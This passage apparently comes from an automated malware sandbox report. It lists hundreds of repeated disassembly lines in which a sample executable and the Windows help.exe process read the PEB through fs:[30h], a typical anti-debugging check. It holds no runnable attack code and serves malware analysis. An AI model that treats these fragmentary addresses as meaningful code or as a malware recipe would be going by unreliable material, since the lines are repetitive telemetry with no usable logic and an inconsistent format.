          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01747E41 mov eax, dword ptr fs:[00000030h]3_2_01747E41
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]3_2_017FAE44
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017FAE44 mov eax, dword ptr fs:[00000030h]3_2_017FAE44
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFE3F mov eax, dword ptr fs:[00000030h]3_2_017EFE3F
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173E620 mov eax, dword ptr fs:[00000030h]3_2_0173E620
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01808ED6 mov eax, dword ptr fs:[00000030h]3_2_01808ED6
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]3_2_0176A61C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A61C mov eax, dword ptr fs:[00000030h]3_2_0176A61C
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C600 mov eax, dword ptr fs:[00000030h]3_2_0173C600
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01768E00 mov eax, dword ptr fs:[00000030h]3_2_01768E00
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F1608 mov eax, dword ptr fs:[00000030h]3_2_017F1608
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017616E0 mov ecx, dword ptr fs:[00000030h]3_2_017616E0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017476E2 mov eax, dword ptr fs:[00000030h]3_2_017476E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01778EC7 mov eax, dword ptr fs:[00000030h]3_2_01778EC7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017636CC mov eax, dword ptr fs:[00000030h]3_2_017636CC
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017EFEC0 mov eax, dword ptr fs:[00000030h]3_2_017EFEC0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B46A7 mov eax, dword ptr fs:[00000030h]3_2_017B46A7
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017CFE87 mov eax, dword ptr fs:[00000030h]3_2_017CFE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2ACB mov eax, dword ptr fs:[00000030h]14_2_02DF2ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2AE4 mov eax, dword ptr fs:[00000030h]14_2_02DF2AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]14_2_02DFD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFD294 mov eax, dword ptr fs:[00000030h]14_2_02DFD294
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]14_2_02DDAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDAAB0 mov eax, dword ptr fs:[00000030h]14_2_02DDAAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFAB0 mov eax, dword ptr fs:[00000030h]14_2_02DFFAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC52A5 mov eax, dword ptr fs:[00000030h]14_2_02DC52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]14_2_02E7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7B260 mov eax, dword ptr fs:[00000030h]14_2_02E7B260
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98A62 mov eax, dword ptr fs:[00000030h]14_2_02E98A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E0927A mov eax, dword ptr fs:[00000030h]14_2_02E0927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9240 mov eax, dword ptr fs:[00000030h]14_2_02DC9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E54257 mov eax, dword ptr fs:[00000030h]14_2_02E54257
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8EA55 mov eax, dword ptr fs:[00000030h]14_2_02E8EA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE3A1C mov eax, dword ptr fs:[00000030h]14_2_02DE3A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]14_2_02DCAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCAA16 mov eax, dword ptr fs:[00000030h]14_2_02DCAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]14_2_02E04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E04A2C mov eax, dword ptr fs:[00000030h]14_2_02E04A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov ecx, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC5210 mov eax, dword ptr fs:[00000030h]14_2_02DC5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD8A0A mov eax, dword ptr fs:[00000030h]14_2_02DD8A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]14_2_02E8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AA16 mov eax, dword ptr fs:[00000030h]14_2_02E8AA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]14_2_02E453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E453CA mov eax, dword ptr fs:[00000030h]14_2_02E453CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEDBE9 mov eax, dword ptr fs:[00000030h]14_2_02DEDBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]14_2_02DF03E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2397 mov eax, dword ptr fs:[00000030h]14_2_02DF2397
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E95BA5 mov eax, dword ptr fs:[00000030h]14_2_02E95BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFB390 mov eax, dword ptr fs:[00000030h]14_2_02DFB390
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]14_2_02DD1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]14_2_02DD1B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8138A mov eax, dword ptr fs:[00000030h]14_2_02E8138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7D380 mov ecx, dword ptr fs:[00000030h]14_2_02E7D380
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]14_2_02DF4BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCF358 mov eax, dword ptr fs:[00000030h]14_2_02DCF358
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB40 mov eax, dword ptr fs:[00000030h]14_2_02DCDB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]14_2_02DF3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]14_2_02DF3B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98B58 mov eax, dword ptr fs:[00000030h]14_2_02E98B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB60 mov ecx, dword ptr fs:[00000030h]14_2_02DCDB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8131B mov eax, dword ptr fs:[00000030h]14_2_02E8131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC58EC mov eax, dword ptr fs:[00000030h]14_2_02DC58EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov ecx, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]14_2_02E5B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E090AF mov eax, dword ptr fs:[00000030h]14_2_02E090AF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9080 mov eax, dword ptr fs:[00000030h]14_2_02DC9080
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov ecx, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]14_2_02DFF0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]14_2_02E43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]14_2_02E43884
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]14_2_02DF20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]14_2_02DE0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]14_2_02DE0050
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E82073 mov eax, dword ptr fs:[00000030h]14_2_02E82073
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91074 mov eax, dword ptr fs:[00000030h]14_2_02E91074
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]14_2_02E47016
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]14_2_02DF002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]14_2_02DDB02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]14_2_02E94015
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]14_2_02E94015
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E7FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E08EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E98ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E446A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E5FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E7FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DF8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DCE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E037F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E98F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DDEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DDFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DEF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E814FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E98CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DD849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DE746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02DFBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\help.exe; Code function: 14_2_02E78DF1 mov eax, dword ptr fs:[00000030h]
